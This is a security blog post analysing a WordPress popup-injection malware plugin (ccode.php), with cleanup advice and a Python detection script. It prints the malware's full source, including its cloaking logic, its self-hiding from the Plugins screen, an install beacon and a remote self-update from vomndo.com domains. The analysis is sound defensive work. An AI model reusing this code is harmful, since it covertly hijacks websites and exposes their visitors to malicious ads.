Source: https://prophaze.com/web-application-firewall/tracking-down-new-wordpress-popup-injection-malware/ (urlscan.io public scan of prophaze.com, submitted May 28 via API from US, scanned from DE)
Web Application Firewall

Tracking Down New WordPress Popup Injection Malware

Prophaze WAF, July 31, 2020

A new variant of popup-injector WordPress malware is spreading and has affected thousands of WordPress websites. In the case described here, the webmaster was receiving roughly one email a week from visitors complaining about adult-content popups on the website.

UPDATE: contact security@prophaze.com to clean this variant and secure your website from similar attacks.

What makes this malware interesting:

* It is not shown to admin users of the website.
* It is not shown to logged-in users.
* Even for visitors who are not logged in, the popup appears only at certain times of the day.
* The popup is served to visitors in different regions.

The last two points are largely explained by the cloaking logic found later in the code: by default the ad is injected only for visitors whose Referer matches a search-engine pattern, marked by an "organic" cookie that lives for just 120 seconds, so a direct visit, a bookmarked visit or a visit from a known admin IP never triggers it.

The site admin worked through the usual steps:

* A complete update of WordPress core: no change.
* Updated all plugins: no change.
* Updated the current theme and its plugins: no change.
* Disabled all plugins and switched to the default theme: no change.

Finally, a file named ccode.php was found sitting directly in the WordPress plugins directory (wp-content/plugins), containing malicious code. On inspection, the code was:

* hiding the popups from admin IP addresses;
* not showing the popups to logged-in users;
* hiding itself from the active plugins list.

It also registers its configuration as ordinary WordPress options, behind a settings page it registers and then removes from the menu, as shown below:

    add_action( 'admin_init', function() {
        register_setting( 'ccode-settings', 'default_mont_options' );
        register_setting( 'ccode-settings', 'ad_code' );
        register_setting( 'ccode-settings', 'hide_admin' );
        register_setting( 'ccode-settings', 'hide_logged_in' );
        register_setting( 'ccode-settings', 'display_ad' );
        register_setting( 'ccode-settings', 'search_engines' );
        register_setting( 'ccode-settings', 'auto_update' );
        register_setting( 'ccode-settings', 'ip_admin');
        register_setting( 'ccode-settings', 'cookies_admin' );
        register_setting( 'ccode-settings', 'logged_admin' );
        register_setting( 'ccode-settings', 'log_install' );
    });

It also auto-updates itself from a remote domain: it fetches update.php and overwrites its own file with the response, provided the response contains the plugin key and a '$version=' marker:

    if (($new_version = @file_get_contents("http://www.vomndo.com/update.php") OR $new_version = @file_get_contents_ccode("http://www.vomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {
        if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
            @file_put_contents(__FILE__, $new_version);
        }
    }

Fallback URLs it tries if the first one goes down:

1) http://www.vomndo.xyz
2) http://www.vomndo.top

Code that hides it from the active plugins list:

    add_action('pre_current_active_plugins', 'hide_plugin_ccode');

Cleanup: delete ccode.php from the plugins directory, then update WordPress core and every plugin and theme, because it is clear that a bot or exploit used an existing vulnerability to write this file into the plugins directory. A few things worth checking while you are there, all of which follow from the code below:

* The file removes itself from the active plugins list in the admin UI, so look at the filesystem (wp-content/plugins) directly rather than at the Plugins screen.
* It writes admin_ips.txt next to itself, a list of your administrators' IP addresses taken from the Client-IP or X-Forwarded-For header (both client-controlled) or REMOTE_ADDR; delete that file as well.
* It stores its configuration in wp_options (ad_code, hide_admin, hide_logged_in, display_ad, search_engines, auto_update, ip_admin, cookies_admin, logged_admin, log_install, default_mont_options); delete those entries so a re-dropped copy does not pick them up silently.
* Logged-in users are given a wordpress_admin_logged_in cookie valid for 1000 days; clear it in your browser before testing, or your own checks will stay cloaked.
* Because the file overwrites itself with whatever update.php returns (as long as the response contains the plugin key), the copy on your site may differ from the one printed below; hunt by behaviour (self-overwrite via file_put_contents(__FILE__), the pre_current_active_plugins hook, the remote update fetch), not by hash.
* To confirm the cleanup, request a single post from an IP that is not in admin_ips.txt, with no cookies and with a search-engine Referer (for example a google.com/search? URL), and check the response for the ad script hosts iclickcdn.com, propu.sh and inpagepush.com.

Full code for reference:

    <?php
    /**
     * Plugin Name: Custom Code
     * Description: show cusom ad codes with many options .
     * Author: Alberto Uozumi
     * Version: 1.0
     */
    error_reporting(0);
    ini_set('display_errors', 0);
    $plugin_key='513ca0e9b3d5b9dbce390430591d7f43';
    $version='1.2';
    // [analysis] registers a settings page and immediately removes it from the menu
    add_action('admin_menu', function() {
        add_options_page( 'ccode Plugin', 'ccode', 'manage_options', 'ccode', 'ccode_page' );
        remove_submenu_page( 'options-general.php', 'ccode' );
    });
    add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_ccode');
    function salcode_add_plugin_page_settings_ccode( $links ) {
        $links[] = '<a href="' . admin_url( 'options-general.php?page=ccode' ) . '">' . __('Settings') . '</a>';
        return $links;
    }
    add_action( 'admin_init', function() {
        register_setting( 'ccode-settings', 'default_mont_options' );
        register_setting( 'ccode-settings', 'ad_code' );
        register_setting( 'ccode-settings', 'hide_admin' );
        register_setting( 'ccode-settings', 'hide_logged_in' );
        register_setting( 'ccode-settings', 'display_ad' );
        register_setting( 'ccode-settings', 'search_engines' );
        register_setting( 'ccode-settings', 'auto_update' );
        register_setting( 'ccode-settings', 'ip_admin');
        register_setting( 'ccode-settings', 'cookies_admin' );
        register_setting( 'ccode-settings', 'logged_admin' );
        register_setting( 'ccode-settings', 'log_install' );
    });
    // [analysis] the injected payload: three third-party ad/push-notification tags
    $ad_code="
    <script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3388587,document.body||document.documentElement)</script>
    <script src=\"https://propu.sh/pfe/current/tag.min.js?z=3388595\" data-cfasync=\"false\" async></script>
    <script type=\"text/javascript\" src=\"//inpagepush.com/400/3388600\" data-cfasync=\"false\" async=\"async\"></script>
    ";
    $hide_admin='on';
    $hide_logged_in='on';
    $display_ad='organic';
    $search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
    $auto_update='on';
    $ip_admin='on';
    $cookies_admin='on';
    $logged_admin='on';
    $log_install='';
    function ccode_page() { ?>
    <div class="wrap">
    <form action="options.php" method="post">
    <?php
    settings_fields( 'ccode-settings' );
    do_settings_sections( 'ccode-settings' );
    $ad_code='';
    $hide_admin='on';
    $hide_logged_in='on';
    $display_ad='organic';
    $search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
    $auto_update='on';
    $ip_admin='on';
    $cookies_admin='on';
    $logged_admin='on';
    $log_install='';
    ?>
    <h2>ccode Plugin</h2>
    <table>
    <tr>
    <th>Ad Code</th>
    <td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td>
    </tr>
    <tr>
    <th>Hide ads to :</th>
    <td>
    <input type="hidden" id="default_mont_options" name="default_mont_options" value="on">
    <label> <input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins </label>
    <label> <input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users </label>
    <br/>
    </td>
    </tr>
    <tr>
    <th>Recognize admin by :</th>
    <td>
    <label> <input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in </label>
    <label> <input type="checkbox" name="ip_admin" id="ip_admin" <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses </label>
    <label> <input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies </label>
    </td>
    </tr>
    <tr>
    <th>Display ads to :</th>
    <td>
    <select name="display_ad">
    <option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option>
    <option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option>
    </select>
    </td>
    </tr>
    <tr>
    <th>Search Engines</th>
    <td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description"> comma separated </p> </td>
    </tr>
    <tr>
    <th>Auto Update :</th>
    <td>
    <label> <input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin </label><br/>
    </td>
    </tr>
    <tr>
    <td><?php submit_button(); ?></td>
    </tr>
    </table>
    </form>
    </div>
    <?php }
    /*************************log install***************************/
    // [analysis] install beacon: reports the infected hostname to the attacker's server once
    if(get_option('log_install') !=='1') {
        if(!$log_installed = @file_get_contents("http://www.vomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"])) {
            $log_installed = @file_get_contents_ccode("http://www.vomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
        }
    }
    /*************************set default options***************************/
    if(get_option('default_mont_options') !=='on') {
        update_option('ip_admin', $ip_admin);
        update_option('ad_code', $ad_code);
        update_option('cookies_admin', $cookies_admin);
        update_option('logged_admin', $logged_admin);
        update_option('hide_admin', $hide_admin);
        update_option('hide_logged_in', $hide_logged_in);
        update_option('display_ad', $display_ad);
        update_option('search_engines', $search_engines);
        update_option('auto_update', $auto_update);
        update_option('log_install', '1');
    }
    /************************************************************************/
    include_once(ABSPATH . 'wp-includes/pluggable.php');
    if ( ! function_exists( 'display_ad_single' ) ) {
        function display_ad_single($content){
            if(is_single()) {
                $content=$content.get_option('ad_code');;
            }
            return $content;
        }
        function display_ad_footer(){
            if(!is_single()) {
                echo get_option('ad_code');
            }
        }
        //setting cookies if admin logged in
        // [analysis] cloaking marker: a 1000-day cookie set for any logged-in user
        function setting_admin_cookie() {
            setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
        }
        if(get_option('cookies_admin')=='on') {
            if(is_user_logged_in()) {
                add_action( 'init', 'setting_admin_cookie',1 );
            }
        }
        //log admin IP addresses
        $vis_ip=getVisIpAddr_ccode();
        if(get_option('ip_admin')=='on') {
            if(current_user_can('edit_others_pages')) {
                if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt')) {
                    $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
                }
                if (stripos($ip, $vis_ip) === false) {
                    $ip.=$vis_ip.' ';
                    @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
                }
            }
        }// end if log admins ip
        //add cookies to organic traffic
        // [analysis] only visitors whose Referer matches a search-engine pattern get the 120-second "organic" cookie
        if(get_option('display_ad')=='organic') {
            $search_engines = explode(',', get_option('search_engines'));
            $referer = $_SERVER['HTTP_REFERER'];
            $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
            foreach ($search_engines as $search) {
                if (strpos($referer,$search)!==false) {
                    setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
                    $organic=true;
                }
            }
        }//end
        //display ad
        // [analysis] the ad is injected only for visitors who are not logged in, carry no admin cookie and are not in admin_ips.txt
        if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in()) {
            $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
            if (stripos($ips, $vis_ip) === false) {
                /*****/
                if(get_option('display_ad')=='organic') {
                    if($organic==true || isset($_COOKIE['organic'])) {
                        add_filter('the_content','display_ad_single');
                        add_action('wp_footer','display_ad_footer');
                    }
                } else {
                    add_filter('the_content','display_ad_single');
                    add_action('wp_footer','display_ad_footer');
                }
                /****/
            }
        }
        /*******************/
        //update plugin
        // [analysis] self-update: overwrites this file with whatever the remote server returns if it contains the plugin key
        if(get_option('auto_update')=='on') {
            if( ini_get('allow_url_fopen') ) {
                if (($new_version = @file_get_contents("http://www.vomndo.com/update.php") OR $new_version = @file_get_contents_ccode("http://www.vomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {
                    if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
                        @file_put_contents(__FILE__, $new_version);
                    }
                } elseif ($new_version = @file_get_contents("http://www.vomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {
                    if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
                        @file_put_contents(__FILE__, $new_version);
                    }
                } elseif ($new_version = @file_get_contents("http://www.vomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {
                    if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
                        @file_put_contents(__FILE__, $new_version);
                    }
                }
            } else {
                if (($new_version = @file_get_contents("http://www.vomndo.com/update.php") OR $new_version = @file_get_contents_ccode("http://www.vomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {
                    if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
                        @file_put_contents(__FILE__, $new_version);
                    }
                } elseif ($new_version = @file_get_contents_ccode("http://www.vomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {
                    if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
                        @file_put_contents(__FILE__, $new_version);
                    }
                } elseif ($new_version = @file_get_contents_ccode("http://www.vomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {
                    if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
                        @file_put_contents(__FILE__, $new_version);
                    }
                }
            }
        }//end if auto update
        /*********************************/
    }// if function exist
    // [analysis] cURL fallback used when allow_url_fopen is off
    function file_get_contents_ccode($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
    // [analysis] removes its own row from the Plugins screen
    function hide_plugin_ccode() {
        global $wp_list_table;
        $hidearr = array('ccode.php');
        $myplugins = $wp_list_table->items;
        foreach ($myplugins as $key => $val) {
            if (in_array($key,$hidearr)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
    add_action('pre_current_active_plugins', 'hide_plugin_ccode');
    // [analysis] admin-IP detection trusts client-supplied headers before REMOTE_ADDR
    function getVisIpAddr_ccode() {
        if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
            return $_SERVER['HTTP_CLIENT_IP'];
        } else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            return $_SERVER['HTTP_X_FORWARDED_FOR'];
        } else {
            return $_SERVER['REMOTE_ADDR'];
        }
    }
    ?>
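To put the analysis and the cleanup advice above into practice (the file hides itself from the Plugins screen, so the filesystem has to be checked directly), here is an added Python hunting script. It is not Prophaze's code and not part of the original post. It walks a plugins directory, scores every PHP file against the indicators visible in the sample above (self-overwrite via file_put_contents(__FILE__), fetching update.php from a remote host, the pre_current_active_plugins hook that unsets rows from $wp_list_table->items, the o2.php?host= install beacon, error_reporting(0), and the admin_ips.txt, wordpress_admin_logged_in and HTTP_REFERER cloaking markers), extracts the remote hosts for a blocklist and the option names the file registers or writes so they can be deleted from wp_options, and lists leftover admin_ips.txt files. The demo tree it builds in a temporary directory, the trimmed file contents in it, the indicator weights and the threshold of 6 are constructed assumptions for the demonstration.

```python
"""Hunt for ccode.php-style popup injectors in a WordPress plugins tree.

Added example for this post: not Prophaze's code and not the malware itself.
Indicator patterns come from the sample on this page; the demo tree, its
trimmed contents, the weights and the threshold are constructed assumptions.
"""
import os
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# (name, regex, weight). Every pattern appears in the ccode.php sample above.
INDICATORS = [
    ("self_overwrite",        r"file_put_contents\s*\(\s*__FILE__", 5),   # rewrites its own file
    ("remote_update_fetch",   r"file_get_contents\w*\s*\(\s*['\"]https?://[^'\"]+/update\.php", 4),
    ("hide_from_plugin_list", r"pre_current_active_plugins", 4),          # vanishes from Plugins screen
    ("unset_plugin_row",      r"unset\s*\(\s*\$wp_list_table->items", 3),
    ("install_phone_home",    r"o2\.php\?host=", 3),                      # install beacon with HTTP_HOST
    ("admin_ip_log",          r"admin_ips\.txt", 2),                      # cloaking: admin IP list on disk
    ("admin_cookie_marker",   r"wordpress_admin_logged_in", 2),           # cloaking: long-lived cookie
    ("errors_suppressed",     r"error_reporting\s*\(\s*0\s*\)", 1),
    ("referer_cloaking",      r"HTTP_REFERER", 1),                        # ads for search traffic only
]
URL_RE = re.compile(r"""https?://[\w.-]+(?:/[^\s"'<>)]*)?""")
REGISTERED_OPT = re.compile(r"register_setting\s*\(\s*['\"][^'\"]+['\"]\s*,\s*['\"]([\w-]+)['\"]")
UPDATED_OPT = re.compile(r"update_option\s*\(\s*['\"]([\w-]+)['\"]")


def scan_file(path):
    """Score one PHP file and pull out the hosts and wp_options names it touches."""
    text = Path(path).read_text(errors="replace")
    hits = [name for name, pat, _ in INDICATORS if re.search(pat, text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    urls = sorted(set(URL_RE.findall(text)))
    options = sorted(set(REGISTERED_OPT.findall(text)) | set(UPDATED_OPT.findall(text)))
    return {"path": str(path), "score": score, "hits": hits, "urls": urls, "options": options}


def scan_plugins(plugins_dir, threshold=6):
    """Walk the plugins tree; return suspicious PHP files plus leftover data files."""
    findings, artifacts = [], []
    for dirpath, _dirs, files in os.walk(plugins_dir):
        for name in files:
            path = Path(dirpath) / name
            if name == "admin_ips.txt":          # the injector's list of your admin IPs
                artifacts.append(str(path))
            elif name.endswith(".php"):
                result = scan_file(path)
                if result["score"] >= threshold:
                    findings.append(result)
    findings.sort(key=lambda r: r["score"], reverse=True)
    return {"findings": findings, "artifacts": artifacts}


def blocklist_hosts(report):
    """Remote hosts referenced by flagged files (update/C2 and ad servers)."""
    return sorted({urlparse(u).netloc for f in report["findings"] for u in f["urls"]})


# Constructed demo files: a trimmed copy of the injector's behaviour and a benign plugin.
MALICIOUS_DEMO = r"""<?php
/* Plugin Name: Custom Code */
error_reporting(0);
$plugin_key='513ca0e9b3d5b9dbce390430591d7f43';
add_action('admin_init', function() {
  register_setting('ccode-settings', 'ad_code');
  register_setting('ccode-settings', 'hide_admin');
});
if(get_option('default_mont_options') !=='on') {
  update_option('ip_admin', 'on');
  update_option('log_install', '1');
}
@file_get_contents("http://www.vomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
$new_version = @file_get_contents("http://www.vomndo.com/update.php");
if (stripos($new_version, $plugin_key) !== false) { @file_put_contents(__FILE__, $new_version); }
function hide_plugin_ccode() { global $wp_list_table; unset($wp_list_table->items['ccode.php']); }
add_action('pre_current_active_plugins', 'hide_plugin_ccode');
"""
BENIGN_DEMO = r"""<?php
/* Plugin Name: Footer Note (constructed benign plugin) */
function footer_note() { echo '<p>Thanks for visiting.</p>'; }
add_action('wp_footer', 'footer_note');
"""


def build_demo_tree():
    """Create a throwaway plugins directory shaped like the infected site."""
    root = Path(tempfile.mkdtemp(prefix="wp-plugins-demo-"))
    (root / "ccode.php").write_text(MALICIOUS_DEMO)       # dropped loose in plugins/
    (root / "admin_ips.txt").write_text("203.0.113.7 ")    # constructed TEST-NET admin IP
    (root / "footer-note").mkdir()
    (root / "footer-note" / "footer-note.php").write_text(BENIGN_DEMO)
    return root


if __name__ == "__main__":
    root = build_demo_tree()                      # point this at your real wp-content/plugins
    report = scan_plugins(root)
    for f in report["findings"]:
        print(f"{f['score']:>3}  {f['path']}  hits={','.join(f['hits'])}")
        print(f"     options to delete from wp_options: {', '.join(f['options'])}")
    print("artifacts to delete:", report["artifacts"])
    print("hosts to block:", blocklist_hosts(report))
```

Point scan_plugins at the real wp-content/plugins path instead of the demo tree. For each flagged file, delete it together with any admin_ips.txt, remove the listed options from wp_options, block the reported hosts at the proxy or WAF, and then re-fetch a post as an anonymous visitor with a search-engine Referer to confirm the ad hosts no longer appear in the response. The weights are heuristics: a single hit on error_reporting(0) or HTTP_REFERER is normal in legitimate plugins, which is why the threshold sits above any one low-weight indicator.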